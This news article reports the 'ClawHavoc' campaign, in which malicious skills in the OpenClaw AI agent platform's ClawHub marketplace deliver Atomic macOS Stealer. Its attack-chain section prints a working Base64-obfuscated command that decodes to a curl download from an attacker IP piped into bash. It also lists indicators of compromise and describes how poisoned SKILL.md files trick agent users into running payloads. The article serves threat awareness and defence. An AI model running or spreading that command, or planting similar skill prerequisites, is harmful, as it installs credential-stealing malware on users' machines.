Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Grafana Labs Security Breach: Hackers Accessed GitHub Code
May 17, 2026
First Public macOS M5 Kernel Exploit Developed Apple Prepared
May 17, 2026
Pwn2Own Day 2: Microsoft Exchange, Win Windows Cursor
May 16, 2026
Home/CyberSecurity News/OpenClaw: New Target in Rising Supply Chain Becomes Wave
CyberSecurity News

OpenClaw: New Target in Rising Supply Chain Becomes Wave

The rapidly growing open-source AI agent platform, OpenClaw, is confronting severe supply chain risks. Attackers are actively poisoning its ClawHub plugin marketplace by introducing malicious skills....

David kimber
David kimber
February 9, 2026 2 Min Read
5 0

The rapidly growing open-source AI agent platform, OpenClaw, is confronting severe supply chain risks. Attackers are actively poisoning its ClawHub plugin marketplace by introducing malicious skills.

Table Of Content

  • Attack Chain Breakdown
  • IOCs
  • Domain IOCs
  • URL IOCs
  • IP IOCs
  • File IOCs

Security firms SlowMist and Koi Security have uncovered hundreds of compromised extensions deploying infostealers like Atomic Stealer.

OpenClaw enables local AI agents to automate workflows, interact with services, and control devices through “skills” modular extensions hosted on ClawHub.

Skills follow the AgentSkills spec, primarily as SKILL.md folders containing executable instructions rather than auditable code. This design shifts Markdown from documentation to operational entry points, making it ripe for abuse.

ClawHub’s permissive upload process lacks rigorous reviews, mirroring vulnerabilities in npm or VS Code marketplaces. Popularity surged recently, drawing developers and attackers alike.

Koi Security scanned 2,857 ClawHub skills, identifying 341 malicious ones 12% infection rate in a campaign dubbed ClawHavoc. SlowMist consolidated IOCs from over 400 samples, noting 472 affected skills with shared infrastructure.

Malicious skills cluster around crypto tools (e.g., Solana trackers, Phantom wallets), YouTube utilities, Polymarket bots, and typosquats like “clawhub1.” They masquerade as updaters, security checks, or finance aids to bypass vigilance.

Attack Chain Breakdown

Attackers embed two-stage payloads in SKILL.md “prerequisites.” Users decode Base64-obfuscated commands like echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC83YnV1MjRseThtMXRuOG00KSI=' | base64 -D | bash, triggering curl | bash downloads.

First-stage droppers fetch scripts from IPs like 91.92.242.30, then pull second-stage binaries (e.g., x5ki60w1ih838sp7). These are ad-hoc signed Mach-O universals matching Atomic macOS Stealer (AMOS), which copies Desktop/Documents data, exfiltrates to C2s like socifiapp.com, and steals Keychain/browser creds, according to SlowMist analysis.

Dynamic analysis reveals phishing dialogs for passwords, ZIP archiving of .txt/.pdf files, and uploads via curl. Reuse of domains/IPs (e.g., 91.92.242.30 linked to Poseidon extortion group) indicates organized operations.

A popular “X (Twitter) Trends” skill hides Base64 backdoors mimicking config output. Decoding yields downloads from 91.92.242.30/q0c7ew2ro8l2cfqp, chaining to dyrtvwjfveyxjf23 a stealer targeting macOS folders. This evades keyword scanners while enabling rapid payload swaps.

IOCs

Domain IOCs

Type Indicator
Domain socifiapp[.]com
Domain rentry[.]co
Domain install[.]app-distribution.net

URL IOCs

Type Indicator
URL hxxp[:]//91.92.242.30/7buu24ly8m1tn8m4
URL hxxp[:]//91.92.242.30/x5ki60w1ih838sp7
URL hxxp[:]//91.92.242.30/528n21ktxu08pmer
URL hxxp[:]//91.92.242.30/66hfqv0uye23dkt2
URL hxxp[:]//91.92.242.30/6x8c0trkp4l9uugo
URL hxxp[:]//91.92.242.30/dx2w5j5bka6qkwxi
URL hxxp[:]//54.91.154.110:13338/
URL hxxp[:]//91.92.242.30/6wioz8285kcbax6v
URL hxxp[:]//91.92.242.30/1v07y9e1m6v7thl6
URL hxxp[:]//91.92.242.30/q0c7ew2ro8l2cfqp
URL hxxp[:]//91.92.242.30/dyrtvwjfveyxjf23
URL hxxps[:]//rentry.co/openclaw-core
URL hxxps[:]//glot.io/snippets/hfdxv8uyaf
URL hxxp[:]//92.92.242.30/7buu24ly8m1tn8m4
URL hxxp[:]//95.92.242.30/7buu24ly8m1tn8m4
URL hxxps[:]//install.app-distribution.net/setup/
URL hxxp[:]//11.92.242.30/7buu24ly8m1tn8m4
URL hxxp[:]//202.161.50.59/7buu24ly8m1tn8m4
URL hxxp[:]//96.92.242.30/7buu24ly8m1tn8m4
URL hxxps[:]//glot.io/snippets/hfd3x9ueu5

IP IOCs

Type Indicator
IP 91.92.242[.]30
IP 104.18.38[.]233
IP 95.92.242[.]30
IP 54.91.154[.]110
IP 92.92.242[.]30
IP 11.92.242[.]30
IP 202.161.50[.]59
IP 96.92.242[.]30

File IOCs

Type Filename SHA256
File dyrtvwjfveyxjf23 30f97ae88f8861eeadeb54854d47078724e52e2ef36dd847180663b7f5763168
File 66hfqv0uye23dkt2 0e52566ccff4830e30ef45d2ad804eefba4ffe42062919398bf1334aab74dd65
File x5ki60w1ih838sp7 1e6d4b0538558429422b71d1f4d724c8ce31be92d299df33a8339e32316e2298
File dx2w5j5bka6qkwxi 998c38b430097479b015a68d9435dc5b98684119739572a4dff11e085881187e
File openclaw-agent.exe 17703b3d5e8e1fe69d6a6c78a240d8c84b32465fe62bed5610fb29335fe42283

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackphishingSecurity

Share Article

David kimber

David kimber

David is a penetration tester turned security journalist with expertise in mobile security, IoT vulnerabilities, and exploit development. As an OSCP-certified security professional, David brings hands-on technical experience to his reporting on vulnerabilities and security research. His articles often feature detailed technical analysis of exploits and provide actionable defense recommendations. David maintains an active presence in the security research community and has contributed to multiple open-source security tools.

Previous Post

Black Basta Ransomware Uses BYOVD for Defense Actors Embeds

Next Post

Telegram Phishing Steals Full User Sessions via Auth

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Linux Kernel Flaw: Read SSH Keys & Passwords
May 16, 2026
Google Project Zero Reveals Pixel 10 Zero- Discloses Zero-Click
May 16, 2026
Android 16 VPN Bypass Exposes User IP Lets Malicious
May 16, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Sarah simpson
Sarah simpson
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Detects Critical MongoDB CVE-

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us